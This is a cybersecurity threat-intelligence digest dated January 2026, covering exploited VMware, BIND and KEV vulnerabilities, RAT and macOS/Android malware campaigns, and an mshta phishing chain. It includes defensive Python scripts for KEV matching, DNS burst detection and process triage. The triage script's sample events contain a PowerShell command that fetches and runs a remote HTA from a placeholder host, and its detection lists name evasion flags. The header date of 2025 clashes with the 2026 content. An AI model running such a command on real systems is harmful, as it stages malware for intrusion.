Daily Drop (1234)
01-26-26
Monday, Jan 26, 2025 // (IG): BB // GITHUB // SN R&D
China’s Expanding Cyber Forces Blend Civilian Talent and Military Strategy, Raising Global Security Stakes
Bottom Line Up Front (BLUF): China has built a sophisticated cyberwarfare ecosystem that combines state-employed military hackers with civilian security researchers, enabling both espionage and offensive operations. The newly formed People’s Liberation Army Cyberspace Force (PLA CSF) and agencies like the Ministry of State Security are leveraging a vast pool of domestic vulnerability researchers, strict reporting laws, and private partnerships to assemble a strategic stockpile of zero-days—capabilities that could be used to disrupt foreign military and civilian infrastructure in times of conflict.
Analyst Comments: By requiring domestic researchers to report all vulnerabilities to the state within 48 hours—and banning their participation in foreign exploit contests—China has effectively built a state-owned zero-day arsenal. The creation of competitions like the Tianfu Cup ensures continued development of elite talent within its borders. The article rightly compares China’s potential cyber doctrine to WWII-era strategic bombing: cripple systems, disrupt logistics, sow public distrust, and paralyze defense infrastructure—all without firing a kinetic shot. Publicized incidents like Volt Typhoon’s infiltration of U.S. critical infrastructure are likely just the tip of the iceberg.
READ THE STORY: RealClearDefense
VMware vCenter RCE Flaw Actively Exploited — CISA Demands Immediate Patching Across Federal Networks
Bottom Line Up Front (BLUF): CVE-2024-37079, a critical remote code execution vulnerability (CVSS 9.8) in VMware vCenter Server, is now being actively exploited in the wild, according to confirmations from both Broadcom and CISA. The flaw, caused by a heap-overflow in the DCERPC protocol, was patched in June 2024, but many systems remain vulnerable. As of January 26, the vulnerability has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog under Binding Operational Directive (BOD) 22-01, requiring federal agencies to remediate within 21 days.
Analyst Comments: The bug affects vCenter’s DCERPC implementation, a protocol used for network management tasks—meaning it sits in the exact control layer threat actors want to compromise. Exploitation allows full takeover of vSphere environments, including creating rogue VMs, cloning snapshots, or escalating privileges silently. We’ve already seen attackers exploit VMware vCenter for espionage and ransomware staging. With no details released yet on the current wave of exploitation, assume both criminal and state-linked APT actors are leveraging this in active campaigns.
READ THE STORY: SDxCentral // SecurityWeek
Remcos RAT Delivered via Fake Resume Emails: New Campaign Targets Organizations with Stealthy Payloads
Bottom Line Up Front (BLUF): Researchers have uncovered a phishing campaign using fake resume-themed emails to deliver the Remcos remote access trojan (RAT). Attackers distribute malicious .zip or .img attachments containing executable droppers disguised as job application materials. Once executed, the payload installs Remcos, granting attackers persistent access, keylogging, and system control capabilities. The campaign uses common evasion techniques to bypass basic AV and EDR solutions.
Analyst Comments: Remcos is a known commodity in the RAT ecosystem—cheap, effective, and commonly seen in commodity phishing. The resume lure is nothing new but still effective, especially when HR or hiring inboxes aren't segmented from internal systems. Once again, we’re reminded how little effort is required to compromise a user when email filtering and endpoint controls aren’t dialed in. Defenders should treat this as a reminder to tighten attachment rules and sandbox strange file types like .img or .iso, which still regularly slip through.
READ THE STORY: GBhackers
Researchers Uncover 76 Zero-Days in EVs and Automotive Tech
Bottom Line Up Front (BLUF): At the inaugural Pwn2Own Automotive 2026 event in Tokyo, security researchers disclosed 76 zero-day vulnerabilities across electric vehicles (EVs), charging infrastructure, and related software ecosystems. Major vendors—including Tesla, Toyota, BMW, and several Tier 1 suppliers—were impacted. Vulnerabilities included remote code execution (RCE), privilege escalation, and full system compromise of EV charging stations and telematics units.
Analyst Comments: While the industry races toward electrification and autonomy, security is clearly lagging. The number and severity of vulnerabilities—RCEs on EV chargers, remote access to in-vehicle systems—demonstrate that many of these products shipped with minimal hardening. These aren’t just infotainment bugs; several of the exploited systems had direct or indirect access to vehicle controls or cloud-based fleet management APIs. Expect both attackers and regulators to take note. For defenders, this is a call to push for threat modeling, code review, and embedded system hardening across automotive suppliers—not just the OEMs.
READ THE STORY: The Register
European Commission’s Revised Cybersecurity Act Targets ‘High-Risk’ Tech Vendors with Supply Chain Ban
Bottom Line Up Front (BLUF): The European Commission has adopted a revised Cybersecurity Act that includes provisions to restrict or ban "high-risk" ICT suppliers from European Union critical infrastructure and public sector projects. The move aligns EU policy more closely with national security concerns and aims to secure the technology supply chain amid growing fears of foreign influence—particularly regarding non-EU vendors from authoritarian states.
Analyst Comments: The revised Act empowers EU institutions to exclude vendors from digital infrastructure if they pose a national security threat, even if those vendors meet technical standards. This reflects growing awareness that supply chain security is not vendor-neutral—origin, ownership, and legal obligations matter. Expect this to affect procurement decisions across member states and drive demand for EU-based or EU-aligned alternatives in cloud services, 5G, and public sector IT deployments.
READ THE STORY: CyberMag
Ransomware Surge: 74% of Global Orgs Hit in 2023, with Education, IT, and Healthcare Leading Victim List
Bottom Line Up Front (BLUF): Per the report, 74% of organizations worldwide were hit by ransomware in 2023. The most affected sectors include education (79%), IT/technology (77%), and healthcare (74%). Attackers continue to leverage vulnerable internet-facing systems and stolen credentials, with remote desktop exploitation remaining a top entry vector.
Analyst Comments: The numbers confirm what frontline defenders already feel: ransomware isn’t just persistent—it’s systemic. The fact that nearly 3 out of 4 organizations faced attacks in a single year underscores that prevention isn’t scaling fast enough, and reactive containment still dominates. Education and healthcare remain soft targets due to outdated infrastructure and resource constraints, while IT firms are increasingly hit for supply chain leverage. Initial access techniques haven’t changed much—just scaled in automation and scope. Credential theft, RDP abuse, and software vulnerabilities are still doing the heavy lifting.
READ THE STORY: GBhackers
CISA Adds Versa, Zimbra, Vite, and Prettier to KEV: Active Exploits Confirmed
Bottom Line Up Front (BLUF): CISA has updated its Known Exploited Vulnerabilities (KEV) catalog with four actively exploited CVEs affecting Versa Networks OS, Zimbra Collaboration Suite, Vite (a JavaScript build tool), and the Prettier code formatter. Federal agencies must patch by deadlines ranging from February 12–14, 2026. The inclusion confirms exploitation in the wild, likely tied to opportunistic or targeted attacks against internet-facing systems and CI/CD environments.
Analyst Comments: This KEV update covers a wide range of enterprise attack surfaces—from network edge devices (Versa) to mail servers (Zimbra) to developer tooling (Vite, Prettier). That’s a full stack of trouble. The exploitation of open-source developer tools like Vite and Prettier is particularly concerning—it suggests threat actors are moving upstream in the supply chain, targeting build environments and CI pipelines. If you’re running any of these tools in production or dev environments, treat this as high priority. For defenders, the KEV list isn’t just a compliance checklist—it’s a threat radar.
READ THE STORY: WPN
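Treating the KEV list as the "threat radar" the analyst describes means joining it to your own inventory and working the BOD 22-01 due dates. The script below is an added example (not code from the page, CISA or any vendor): it does that join over a constructed two-entry KEV snapshot and a constructed inventory; the field names follow the public KEV JSON feed, and only CVE-2024-37079 is a real identifier taken from this issue.

```python
"""Cross-check a KEV catalog snapshot against an asset inventory.

Added example, not code from the page, CISA or any vendor. The two KEV
entries and the inventory are CONSTRUCTED samples; field names follow the
public KEV JSON feed (cveID, vendorProject, product, dateAdded, dueDate,
knownRansomwareCampaignUse). Only CVE-2024-37079 is a real id from the
story; the second entry uses an obvious placeholder id.
"""
import json
from datetime import date

# Constructed snapshot in the shape of the KEV feed (dates are sample values).
KEV_SNAPSHOT = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2024-37079", "vendorProject": "VMware", "product": "vCenter Server",
     "dateAdded": "2026-01-26", "dueDate": "2026-02-16", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-0000-PLACEHOLDER", "vendorProject": "Zimbra", "product": "Collaboration Suite",
     "dateAdded": "2026-01-23", "dueDate": "2026-02-13", "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed inventory: one row per deployed product and the team to page.
# Spelling deliberately drifts from the feed to exercise normalization.
INVENTORY = [
    {"host": "vc01.corp.example", "vendor": "VMware", "product": "vCenter Server", "owner": "virt-team"},
    {"host": "mail.corp.example", "vendor": "zimbra", "product": "Collaboration  Suite", "owner": "messaging"},
    {"host": "gw.corp.example", "vendor": "Versa Networks", "product": "Versa OS", "owner": "netops"},
]


def _norm(text):
    """Case- and whitespace-insensitive key, since CMDB spellings drift."""
    return " ".join(text.lower().split())


def load_kev(raw_json):
    return json.loads(raw_json)["vulnerabilities"]


def match_kev(kev_entries, inventory, today):
    """One finding per (asset, KEV entry) whose vendor and product match.

    today is an ISO date string; days_left goes negative once the BOD 22-01
    due date has passed. Findings are sorted most urgent first.
    """
    now = date.fromisoformat(today)
    findings = []
    for entry in kev_entries:
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if (_norm(asset["vendor"]) == _norm(entry["vendorProject"])
                    and _norm(asset["product"]) == _norm(entry["product"])):
                findings.append({
                    "host": asset["host"], "owner": asset["owner"],
                    "cve": entry["cveID"], "due": entry["dueDate"],
                    "days_left": (due - now).days,
                    "ransomware": entry.get("knownRansomwareCampaignUse", "Unknown"),
                })
    findings.sort(key=lambda f: f["days_left"])
    return findings


if __name__ == "__main__":
    for f in match_kev(load_kev(KEV_SNAPSHOT), INVENTORY, "2026-01-28"):
        state = "OVERDUE" if f["days_left"] < 0 else f"{f['days_left']}d left"
        print(f"{f['host']:<20} {f['cve']:<24} due {f['due']} ({state}) -> {f['owner']}")
```

The Versa gateway in the inventory has no matching entry in the constructed snapshot, so it produces no finding; in practice you would feed the full feed and the full CMDB export.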
Microsoft Teams to Share Employee Location: New Feature Raises Security and Privacy Flags
Bottom Line Up Front (BLUF): Microsoft Teams will soon allow organizations to track and share employee location data through a new "Location API." Intended for industries with mobile or field-based workforces, the feature integrates with frontline apps and enables real-time location sharing—potentially down to GPS precision. While Microsoft pitches it as an efficiency tool, the shift raises privacy and security concerns around data exposure, abuse, and compliance risks.
Analyst Comments: Location tracking in enterprise collaboration tools is a double-edged sword. Yes, it can streamline field operations and support dispatch use cases—but it also creates a juicy new data source that, if misconfigured or breached, could expose sensitive employee movements. For organizations already struggling with M365 security hygiene, adding location data into the mix raises the stakes. Expect this to be closely watched by privacy teams, insider threat programs, and regulators—especially in tightly controlled industries or regions with strong worker data protections (e.g., GDPR, HIPAA). Security teams should prepare to audit API usage and access controls before enabling.
READ THE STORY: GBhackers
Rustdoor Malware Masquerades as Apple Installer: New Variant Targets macOS with Backdoor Capabilities
Bottom Line Up Front (BLUF): A newly discovered macOS malware dubbed Rustdoor is disguising itself as a legitimate Apple installer package to deploy a stealthy backdoor. Written in Rust and signed with an Apple Developer ID, the malware evades Gatekeeper and runs on Apple Silicon. Once executed, it establishes persistent access, harvests system info, and awaits commands from its C2 server. Researchers say it's actively being updated and shows signs of targeted delivery.
Analyst Comments: macOS isn’t immune—attackers are just more selective. Rustdoor is a solid reminder that Apple platforms, especially in developer-heavy environments, are viable targets for stealthy backdoors. The use of Rust offers cross-platform flexibility and complicates static analysis. Combine that with a valid Apple signature and this thing slides right past casual defenses. The malware appears designed for reconnaissance and long-term access, not smash-and-grab theft. That smells like espionage or at least well-resourced criminal activity. Organizations relying on Macs should revisit their assumptions around threat models and ensure telemetry on install packages, persistence mechanisms (LaunchAgents, LaunchDaemons), and signed binaries.
READ THE STORY: Freebuf
Cursor's Hidden Trap: Malicious tasks.json Files Turn AI Coding Assistants into Stealthy Backdoors
Bottom Line Up Front (BLUF): When an AI tool auto-generates or accepts malicious project files, it may unknowingly execute hidden payloads during task runs—giving attackers a stealthy, code-signed path to system compromise. This novel technique highlights how AI coding copilots can be manipulated into delivering malware under the guise of trusted automation.
READ THE STORY: WPN
New Android Malware “Wpeeper” Uses P2P Communication to Evade Takedown and Control Infected Devices
Bottom Line Up Front (BLUF): Hidden inside repackaged apps—some masquerading as popular tools—the malware avoids centralized command-and-control infrastructure by leveraging the libp2p protocol, typically used in decentralized networks. The campaign appears targeted, and the malware is capable of data exfiltration, remote command execution, and app management.
Analyst Comments: Wpeeper shows a growing trend of mobile malware adopting decentralized C2 models to resist takedown. By using libp2p, attackers eliminate the single point of failure that traditional infrastructure-based malware depends on. That means sinkholing or blocking a few IPs won’t stop this. The malware’s modular functionality—command execution, file access, app control—makes it dangerous in both personal and BYOD enterprise contexts. What’s most concerning is its use of repackaged legitimate apps as delivery vectors, which continues to be a soft spot in Android’s supply chain. Mobile EDRs should start treating P2P traffic as a red flag.
READ THE STORY: Freebuf
Data Breaches Fuel Crypto Laundering: How Cybercrime Markets Turn Stolen Credentials into Stablecoin Profits
Bottom Line Up Front (BLUF): This piece sheds light on how cybercriminals convert stolen credentials and PII from data breaches into laundered funds using USD-pegged stablecoins. These laundering paths—ranging from direct extortion to fraud and insider abuse—often go undetected due to a disconnect between cybersecurity teams and compliance units. Analysts warn that stablecoins' liquidity, speed, and uneven global regulation make them increasingly attractive to actors seeking to evade sanctions and obfuscate illicit financial flows.
Analyst Comments: They're bridging compromised databases to stablecoin liquidity in minutes, and the defensive side is struggling to keep up. Stablecoins like USDT and USDC now serve as the de facto exit ramp for cybercrime profits, particularly from ransomware and account takeover campaigns. Unless incident response starts integrating chain intelligence and transaction telemetry, detection gaps will persist.
READ THE STORY: Freebuf
"White-Hat" Bots vs. Hackers: Front-Running Theft on Ethereum, But Not Everyone Gets Their Money Back
Bottom Line Up Front (BLUF): A new exposé from CryptoRank reveals how MEV bots—typically seen as profit-seeking tools—are being used by white-hat actors to front-run active hacks on Ethereum, intercepting stolen funds before attackers can cash out. These bots, however, act unilaterally in deciding who gets reimbursed, raising ethical and operational questions about trustless systems suddenly hinging on human discretion.
Analyst Comments: The bots beat thieves by exploiting the same MEV (Maximal Extractable Value) mechanics hackers use, essentially racing malicious transactions to the finish line. But here’s the kicker: the white-hats holding these recovered funds decide who, if anyone, gets refunded, often favoring large protocols or users with connections, while smaller victims go unnoticed.
READ THE STORY: Cryptorank
BIND 9 Flaw Triggers Server Crashes: Critical DoS Bug Impacts DNS Infrastructure
Bottom Line Up Front (BLUF): A newly disclosed vulnerability in BIND 9, the widely used DNS server software, allows remote attackers to crash affected servers by sending specially crafted queries. The flaw, tracked as CVE-2023-50387, affects multiple versions and has been actively crashing DNS servers in the wild. ISC (Internet Systems Consortium) has issued patches, and admins are urged to update immediately to prevent service outages.
Analyst Comments: A remotely triggerable DoS like this doesn’t need to be sexy to be dangerous. Attackers don’t need RCE to cause real damage when they can repeatedly knock out name resolution. While no data theft or takeover is involved, this could be weaponized for disruption, DDoS amplification, or masking other attacks during outages. If you’re running BIND—especially on externally accessible resolvers—patch now, and monitor for query-based anomalies.
READ THE STORY: GBhackers
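For the "monitor for query-based anomalies" advice above, here is an added example (not code from the page or ISC): a per-client sliding-window burst detector over constructed BIND 9 querylog lines. The window and threshold are assumed tuning values to set against your resolver's real baseline.

```python
"""Spot per-client query bursts in BIND 9 querylog output.

Added example, not code from the page or ISC. The log lines are
CONSTRUCTED in the querylog shape ('client <addr>#<port> (<name>):
query: <name> IN <type> <flags>'); the window and threshold are
assumptions to tune against a real resolver's baseline.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) client(?: @0x[0-9a-f]+)? "
    r"(?P<client>[\d.]+)#\d+ \((?P<qname>[^)]*)\): query: \S+ IN (?P<qtype>\S+) (?P<flags>\S+)")


def _line(ts, client, name, qtype="A"):
    """Render one constructed querylog line (198.51.100.1 is a doc-range address)."""
    stamp = ts.strftime("%d-%b-%Y %H:%M:%S.") + f"{ts.microsecond // 1000:03d}"
    return (f"{stamp} client @0x7f1a {client}#40000 ({name}): query: {name} IN {qtype} "
            "+E(0)K (198.51.100.1)")


def build_sample_log():
    """Constructed: light normal traffic plus one client sending 60 queries in ~2 s."""
    base = datetime(2026, 1, 26, 10, 0, 0)
    lines = []
    for i in range(10):  # ten distinct clients, one query each, spread over 50 s
        lines.append(_line(base + timedelta(seconds=i * 5), f"192.0.2.{10 + i}", "www.example.com"))
    for i in range(60):  # burst from a single source, mostly ANY queries
        t = base + timedelta(seconds=20, milliseconds=i * 33)
        lines.append(_line(t, "203.0.113.5", f"h{i}.example.com", "ANY" if i % 3 else "A"))
    return lines


def parse(line):
    """Return the parsed fields of a querylog line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d-%b-%Y %H:%M:%S.%f")
    return rec


def find_bursts(lines, window=timedelta(seconds=5), threshold=20):
    """Map client -> peak number of queries seen inside any `window`, for clients
    at or above `threshold`. Assumes lines arrive in time order, as querylog does;
    lines that do not parse are skipped."""
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for rec in filter(None, map(parse, lines)):
        q = recent[rec["client"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()  # drop timestamps that fell out of the window
        peak[rec["client"]] = max(peak[rec["client"]], len(q))
    return {c: n for c, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    for client, n in find_bursts(build_sample_log()).items():
        print(f"burst: {client} sent {n} queries within 5 s")
```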
Items of interest
Multi-Stage Phishing Campaign Hits Russian Targets via Microsoft Windows Exploits
Bottom Line Up Front (BLUF): Rescana researchers have identified a targeted phishing campaign exploiting Microsoft Windows systems in Russian organizations. The attack uses a multi-stage infection chain, beginning with phishing emails that deliver archives containing a deceptive shortcut (.lnk) file. This triggers a PowerShell-based payload used to stage additional malware. The attackers abuse native Windows components like mshta.exe and evade detection by hosting payloads on compromised Russian infrastructure. Attribution is still unclear.
Analyst Comments: Using .lnk files and Windows-native binaries like mshta.exe lets the malware blend in with legitimate activity—harder to detect, especially in environments without PowerShell logging or command-line auditing. The choice to host payloads on Russian servers likely reflects an attempt to reduce suspicion in-country. While attribution isn’t definitive, the campaign’s focus on Russian government and tech targets suggests either espionage or false flag by a nation-state actor. The sophistication points beyond criminal crews.
READ THE STORY: Rescana
Understanding MSHTA: A Classic Windows Attack Still Used Today (Video)
FROM THE MEDIA: Principal Threat Researcher Matt Graeber from Red Canary discusses the continued relevance of the MSHTA attack technique highlighted in their latest threat detection report. This video covers how attackers leverage mshta.exe and mshtml.dll to execute malicious code, common tactics like embedding HTA in legitimate files (even signed ones!), and the shift towards delivering infostealers.
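The .lnk to PowerShell to mshta.exe chain in the Rescana story and the MSHTA technique in the Red Canary video both come down to command-line auditing, which the analyst notes many environments lack. The triage below is an added example (not code from the page, Rescana or Red Canary) that scores constructed process-creation events for that chain; the indicators and weights are assumptions to tune, not a published rule.

```python
"""Triage process-creation events for the .lnk -> PowerShell -> mshta chain.

Added example, not code from the page, Rescana or Red Canary. EVENTS are
CONSTRUCTED in a Sysmon Event ID 1 / Security 4688-like shape; indicators
and weights are assumptions to tune against your baseline, not a rule set.
"""
import ntpath
import re

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
SCRIPT_PROTO = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
PS_EVASION = ("-w hidden", "-windowstyle hidden", "-ep bypass",
              "-executionpolicy bypass", "-enc ", "-encodedcommand", "-nop")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# Constructed events; 203.0.113.7 is a documentation-range address.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "mshta http://203.0.113.7/resume.hta"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.7/resume.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\u\Desktop\notes.txt"},
]


def score_event(ev):
    """Return (severity, reasons); severity is None when nothing matched."""
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    cmd = ev["CommandLine"].lower()
    hits = []  # (weight, reason)
    if image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            hits.append((3, "mshta loading a remote HTA"))
        if SCRIPT_PROTO.search(cmd):
            hits.append((3, "mshta running an inline script: protocol"))
        if parent in SHELLS | OFFICE:
            hits.append((2, f"mshta spawned by {parent}"))
        elif parent == "explorer.exe":
            # A double-clicked .lnk shows up as explorer.exe -> child: weak on its own.
            hits.append((1, "mshta launched from explorer (possible .lnk)"))
    if image in {"powershell.exe", "pwsh.exe"}:
        flags = [f.strip() for f in PS_EVASION if f in cmd]
        if flags:
            hits.append((1, "powershell evasion flags: " + ", ".join(flags)))
        if "mshta" in cmd:
            hits.append((2, "powershell launching mshta"))
    total = sum(w for w, _ in hits)
    severity = "high" if total >= 3 else "medium" if total == 2 else "low" if total == 1 else None
    return severity, [r for _, r in hits]


def triage(events):
    """Index, severity and reasons for every event that matched at least once."""
    scored = [(i, *score_event(ev)) for i, ev in enumerate(events)]
    return [row for row in scored if row[1]]


if __name__ == "__main__":
    for i, sev, reasons in triage(EVENTS):
        print(f"[{sev.upper():6}] event {i}: " + "; ".join(reasons))
```

Without command-line fields in the events (plain 4688 without the audit policy enabled), everything here except the parent/child pairing goes blind, which is the gap the analyst points at.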
Malware of the Future: What an infected system looks like in 2025 (Video)
FROM THE MEDIA: Malware of the future: what does an infected system look like in 2025? Hard to tell. In this video, we have a system infected with plenty of trojans.
The selected stories cover a broad range of cyber threats and are intended to help readers frame key publicly discussed threats and improve overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, don't hesitate to get in touch with InfoDom Securities at dominanceinformation@gmail.com.